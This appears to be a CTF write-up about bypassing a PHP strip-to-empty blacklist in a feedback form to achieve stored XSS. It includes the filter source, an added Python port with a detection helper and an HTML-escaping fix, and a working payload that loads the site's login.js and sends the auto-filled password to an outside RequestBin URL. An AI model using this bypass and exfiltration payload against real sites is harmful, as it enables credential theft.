Pressing F12 on the login page shows <script src="./js/login.js"></script>; opening that file reveals part of the source:

// Parse document.cookie into a key/value map and, if both "user" and "psw"
// cookies exist, pre-fill the login form with them (the "remember password" feature).
if (document.cookie && document.cookie != '') {
  var cookies = document.cookie.split('; ');
  var cookie = {};
  for (var i = 0; i < cookies.length; i++) {
    var arr = cookies[i].split('=');
    var key = arr[0];
    cookie[key] = arr[1];
  }
  if (typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined") {
    document.getElementsByName("username")[0].value = cookie['user'];
    document.getElementsByName("password")[0].value = cookie['psw'];
  }
}

This code fills both the username and the password into the form from cookies (a "remember password" feature). Next, register an arbitrary user and log in. Once inside, the page tells us this challenge is not about injection. Clicking "feedback" at the top reveals an input box, and F12 shows source code inside an HTML comment:

if(is_array($feedback)){
    echo "<script>alert('反馈不合法');</script>";
    return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
    // Strip the current word (case-insensitively) until no occurrence is left,
    // then move on to the next word. Earlier words are never re-checked.
    while(true){
        if(stripos($feedback,$val) !== false){
            $feedback = str_ireplace($val,"",$feedback);
        }
        else{
            break;
        }
    }
}

From the contents of the blacklist and the presence of an input box, we can guess this is XSS. The filter only replaces each blacklisted word with the empty string, which is easy to bypass: for example, write input as incookieput. (cookie is used as the inserted word because it is the last entry in the blacklist; once cookie has been stripped, the loop is finished, so the input that re-forms from the remaining characters is never checked again.)
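To show why this strip-to-empty filter fails and what the fix looks like, here is an added example that is not part of the challenge or the original post: a Python port of the PHP loop above, a check that reports any blacklisted word still present after filtering, and the standard defence of HTML-encoding the feedback at output time instead of blacklisting substrings. The sample strings are constructed for the demonstration.

```python
import html
import re

# Blacklist copied from the challenge's PHP filter. Order matters: each word is
# handled once, in sequence, and 'cookie' is the last one.
BLACKLIST = ['_', "'", '&', '\\', '#', '%', 'input', 'script', 'iframe', 'host',
             'onload', 'onerror', 'srcdoc', 'location', 'svg', 'form', 'img', 'src',
             'getElement', 'document', 'cookie']


def strip_blacklist(feedback: str) -> str:
    """Port of the page's PHP loop (stripos/str_ireplace are case-insensitive).

    For each word, remove every occurrence until none is left, then move to the
    next word. A word earlier in the list is never re-checked, so if removing a
    later word re-forms it, the re-formed word survives."""
    for val in BLACKLIST:
        pattern = re.compile(re.escape(val), re.IGNORECASE)
        while pattern.search(feedback):
            feedback = pattern.sub("", feedback)
    return feedback


def surviving_blacklist_words(feedback: str) -> list[str]:
    """Detection helper: blacklisted words present in the filter's own output.

    A non-empty result means the filter let a forbidden token through, which is
    exactly the failure mode the writeup exploits."""
    out = strip_blacklist(feedback).lower()
    return [w for w in BLACKLIST if w.lower() in out]


def render_feedback_safely(feedback: str) -> str:
    """Hardened alternative: treat the feedback as data and encode it for the
    HTML text context at output time. '<', '>', '&', '"' and "'" become entities,
    so no tag or attribute can be formed regardless of which words are used."""
    return html.escape(feedback, quote=True)


if __name__ == "__main__":
    sample = "<incookieput type=text>"          # constructed test string
    print(strip_blacklist(sample))             # the 'input' tag re-forms
    print(surviving_blacklist_words(sample))   # ['input']
    print(render_feedback_safely(sample))      # inert text, no tag
```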

Other people's writeups note that this challenge has a CSP, so external JS cannot be loaded; we therefore have to work with the challenge's own JS. login.js implements the remember-password feature, so we build a payload, submit it through the feedback input box, and use BUU's RequestBin to receive the callback.

Payload:

<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>
  var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
  documcookieent.locacookietion="http://http.requestbin.buuoj.cn/s4dpjps4/?a="+passwd;
</scricookiept>

After the submission succeeds, wait a short while and the flag appears in RequestBin.
